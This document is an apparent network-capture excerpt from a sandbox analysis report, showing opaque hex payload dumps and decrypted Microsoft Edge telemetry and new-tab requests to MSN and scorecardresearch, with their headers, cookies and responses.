2025-01-09 13:56:15 UTC	1390	IN	Data Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G\|?6:{r;iGW
2025-01-09 13:56:15 UTC	1390	IN	Data Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}\|.nw'Gw=n'CSZB=
2025-01-09 13:56:15 UTC	1390	IN	Data Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83 Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%pA8C4qc(>@z1/V\|#Bo4v_mnniN ZKa./<_PBzi7~>v
2025-01-09 13:56:15 UTC	1390	IN	Data Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82 Data Ascii: =K`!3\|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9\|c`rlqIm7n/n$i9xS=qwlVs^\|\|s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
2025-01-09 13:56:15 UTC	1390	IN	Data Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89 Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm\|n9*ENf+y1AQ-9w.Tvm'W:iw\|K.9-6l[/y[}5'y$+H%:Y1/F\
2025-01-09 13:56:15 UTC	1390	IN	Data Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05 Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i\|\|$yfxE?d;VR??p\<Wp;s.IN1 Q9
2025-01-09 13:56:15 UTC	1390	IN	Data Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63 Data Ascii: QNtY\|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?\|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	50002	18.244.18.122	443	3704	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:15 UTC	925	OUT	GET /b?rn=1736430974307&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3D203036AC4A619B0A382559AD536038&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-09 13:56:15 UTC	956	IN	HTTP/1.1 302 Found Content-Length: 0 Connection: close Date: Thu, 09 Jan 2025 13:56:15 GMT Location: /b2?rn=1736430974307&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3D203036AC4A619B0A382559AD536038&cs_fpit=o&cs_fpdm=null&cs_fpdt=null set-cookie: UID=1C563ea3889fe3abb964bcb1736430975; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000 set-cookie: XID=1C563ea3889fe3abb964bcb1736430975; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000 Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 d025091c574ce1bcf1fefea59ac34f2c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA56-P11 X-Amz-Cf-Id: 7K14pyJGTgaMfiu92ZglXlMwZrXMT3ercU5VppoZnwRbp8XxlEnOdA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	50028	52.182.143.215	443	3704	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:16 UTC	1082	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430974305&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 3857 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=3D203036AC4A619B0A382559AD536038; _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; _EDGE_V=1
2025-01-09 13:56:16 UTC	3857	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 35 36 3a 31 34 2e 33 30 31 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 61 61 31 30 35 66 35 35 2d 66 65 32 36 2d 34 33 62 33 2d 61 63 66 66 2d 61 32 31 36 66 34 37 33 61 61 39 61 22 2c 22 65 70 6f 63 68 22 3a 22 33 38 33 30 36 33 37 31 34 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.PageView","time":"2025-01-09T13:56:14.301Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"aa105f55-fe26-43b3-acff-a216f473aa9a","epoch":"3830637148"},"app":{"locale
2025-01-09 13:56:16 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=4b5ab124023c47af8eca68871571ba5e&HASH=4b5a&LV=202501&V=4&LU=1736430976584; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:56:16 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=93535a55098142fdaa66cdf25ffb37f7; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:26:16 GMT; Path=/;Secure; SameSite=None time-delta-millis: 2279 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Thu, 09 Jan 2025 13:56:16 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	50031	108.139.47.33	443	3704	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:16 UTC	1012	OUT	GET /b2?rn=1736430974307&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3D203036AC4A619B0A382559AD536038&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: UID=1C563ea3889fe3abb964bcb1736430975; XID=1C563ea3889fe3abb964bcb1736430975
2025-01-09 13:56:16 UTC	326	IN	HTTP/1.1 204 No Content Connection: close Date: Thu, 09 Jan 2025 13:56:16 GMT Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 56d4c538e370aeaeaa8463ce6c4a1044.cloudfront.net (CloudFront) X-Amz-Cf-Pop: JFK50-P1 X-Amz-Cf-Id: UP66YenjmPCHZkRqJbsnlLJuIF4f6mGO1EExydhzmLc3U38VgDgWAw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	50037	20.110.205.119	443	3704	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:16 UTC	1261	OUT	GET /c.gif?rnd=1736430974307&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=23f67ca56f3344ec8d439db43c56096e&activityId=23f67ca56f3344ec8d439db43c56096e&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=CBE9B832AE174D9099F2C882F1E1862A&MUID=3D203036AC4A619B0A382559AD536038 HTTP/1.1 Host: c.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=3D203036AC4A619B0A382559AD536038; _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; _EDGE_V=1; SM=T
2025-01-09 13:56:17 UTC	983	IN	HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate, no-store Pragma: no-cache Content-Type: image/gif Last-Modified: Wed, 08 Jan 2025 16:37:23 GMT Accept-Ranges: bytes ETag: "dda11c98eb61db1:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure; Set-Cookie: MUID=3D203036AC4A619B0A382559AD536038; domain=.msn.com; expires=Tue, 03-Feb-2026 13:56:17 GMT; path=/; SameSite=None; Secure; Priority=High; Set-Cookie: SRM_M=3D203036AC4A619B0A382559AD536038; domain=c.msn.com; expires=Tue, 03-Feb-2026 13:56:17 GMT; path=/; SameSite=None; Secure; Set-Cookie: MR=0; domain=c.msn.com; expires=Thu, 16-Jan-2025 13:56:17 GMT; path=/; SameSite=None; Secure; Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Thu, 09-Jan-2025 14:06:17 GMT; path=/; SameSite=None; Secure; Date: Thu, 09 Jan 2025 13:56:16 GMT Connection: close Content-Length: 42
2025-01-09 13:56:17 UTC	42	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b Data Ascii: GIF89a!,L;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	50057	131.253.33.203	443	3704	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:18 UTC	2138	OUT	GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1 Host: ntp.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-viewport-height: 876 sec-ch-ua-arch: "x86" sec-ch-viewport-width: 1232 sec-ch-ua-platform-version: "10.0.0" downlink: 5.45 sec-ch-ua-bitness: "64" sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-platform: "Windows" device-memory: 8 rtt: 300 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-full-version: "117.0.2045.47" sec-ch-dpr: 1 ect: 4g Accept: / sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false} Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=23F67CA56F3344EC8D439DB43C56096E.RefC=2025-01-09T13:56:09Z; USRLOC=; MUID=3D203036AC4A619B0A382559AD536038; MUIDB=3D203036AC4A619B0A382559AD536038; _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=aa105f55-fe26-43b3-acff-a216f473aa9a; ai_session=CIHHYJi2caRpQYELrLG2Co\|1736430974303\|1736430974303; sptmarket_restored=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=23F67CA56F3344EC8D439DB43C56096E.RefC=2025-01-09T13:56:09Z
2025-01-09 13:56:18 UTC	8412	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 53839 Content-Type: text/html; charset=utf-8 Set-Cookie: _C_ETH=1; domain=.msn.com; path=/; secure; httponly Set-Cookie: _C_Auth= Set-Cookie: sptmarket_restored=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/ Set-Cookie: USRLOC=; expires=Sat, 09 Jan 2027 13:56:18 GMT; domain=.msn.com; path=/; secure; samesite=none; httponly Set-Cookie: _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; domain=.msn.com; path=/; httponly Access-Control-Allow-Methods: HEAD,GET,OPTIONS Content-Security-Policy: child-src 'self';connect-src 'self' .mavideo.microsoft.com arc.msn.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn browser.events.data.msn.com browser.events.data.msn.cn browser.events.data.microsoftstart.com browser.events.data.microsoftstart.cn business.bing.com/api/ usgov.business.bing.com/api/ cdn.hubblecontent.osi.office.net copilotexplore.azurewebsites.net events-sandbox.data.msn.com events-sandbox.data.msn.cn events-sandbox.data.microsoftstart.com events-sandbox.data.microsoftstart.cn finance-services.msn.com https://.sharepoint.com/_api/v2.0/ https://.sharepoint-df.com/_api/v2.0/ https://.sharepoint.com/_api/v2.1/ https://*.sharepoint-df.com/_api/v2.1/ https://bingretailmsndata.azureedge.net/msndata/ https://browser.pipe.aria.microsoft.com/Collector/ https://dev.virtualearth.net/REST/v1/Imagery/ https://dev.ditu.live.com/REST/v1/Imagery/ https://ecn.dev.virtualearth.net https://jsconfig.adsafeprotected.com https://g.bing.com https://msx.bing.com https://pet [TRUNCATED] X-Robots-Tag: noindex X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1 X-UA-Compatible: IE=Edge;chrome=1 x-fabric-cluster: pmeprodeus report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]},{"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://deff.nelreports.net/api/report"}]} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.5} Strict-Transport-Security: max-age=1209600; includeSubDomains; preload Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Prefers-Color-Scheme, Device-Memory, Downlink, ECT, RTT, Sec-CH-DPR X-Ceto-ref: 677fd5820c3343c09ee9b548ae61fbcf\|AFD:D9665E3AB34A46C5B6CB918B23D2F1F2\|2025-01-09T13:56:18.477Z X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: D9665E3AB34A46C5B6CB918B23D2F1F2 Ref B: BL2AA2030104003 Ref C: 2025-01-09T13:56:18Z Date: Thu, 09 Jan 2025 13:56:18 GMT Connection: close
2025-01-09 13:56:18 UTC	9	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 Data Ascii: <!DOCTYPE
